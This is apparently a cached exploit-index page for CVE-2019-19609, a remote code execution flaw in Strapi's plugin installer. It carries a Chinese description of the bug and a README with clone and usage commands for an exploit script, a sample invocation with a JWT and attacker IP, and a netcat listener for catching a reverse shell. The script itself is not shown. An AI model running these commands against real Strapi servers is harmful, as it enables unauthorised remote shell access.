CVE-2019-19609 PoC — Strapi Admin面板Install and Uninstall Plugin组件输入验证错误漏洞

Source

https://github.com/diego-tella/CVE-2019-19609-EXPLOIT

Associated Vulnerability

Title:Strapi Admin面板Install and Uninstall Plugin组件输入验证错误漏洞 (CVE-2019-19609)
Description:Strapi是一套开源的无头内容管理系统（CMS）。Install and Uninstall Plugin是其中的一个安装卸载插件。 Strapi中的Admin面板的Install and Uninstall Plugin组件存在远程代码执行漏洞，该漏洞源于程序没有清理插件名。攻击者可借助‘execa’函数利用该漏洞注入并执行任意的shell命令。

Description

Exploit for CVE-2019-19609 in Strapi (Remote Code Execution)

Readme

# CVE-2019-19609-EXPLOIT
Exploit for CVE-2019-19609 in Strapi (Remote code execution in strapi-3.0.0-beta.17.7 or earlier).<br>
I was faced with a scenario with this vulnerability, but without a public exploit. I decided to create my own and share it here.

<h2>Instalation</h2>

```
git clone https://github.com/diego-tella/CVE-2019-19609-EXPLOIT
```

<h2>Usage</h2>

```
cd CVE-2019-19609-EXPLOIT
python exploit.py -d DOMAIN_OR_IP -jwt JSON_WEB_TOKEN -l LHOST -p LPORT
```

```
python exploit.py -d example.com -jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwMjU3NDc3LCJleHAiOjE2MzI4NDk0Nzd9.JIKHRz_EDXg1fhThRhIbIyZ9w-6mE01dhnno2AtMMU0 -l 10.10.14.86 -p 1221
```

On another terminal, starts listening to the port passed in the exploit

```
nc -vnlp 1221
```

File Snapshot


 [4.0K]  /data/pocs/0f94a1bc5142cfb660d45c886a1477537a3cc692
├── [1.4K]  exploit.py
└── [ 799]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!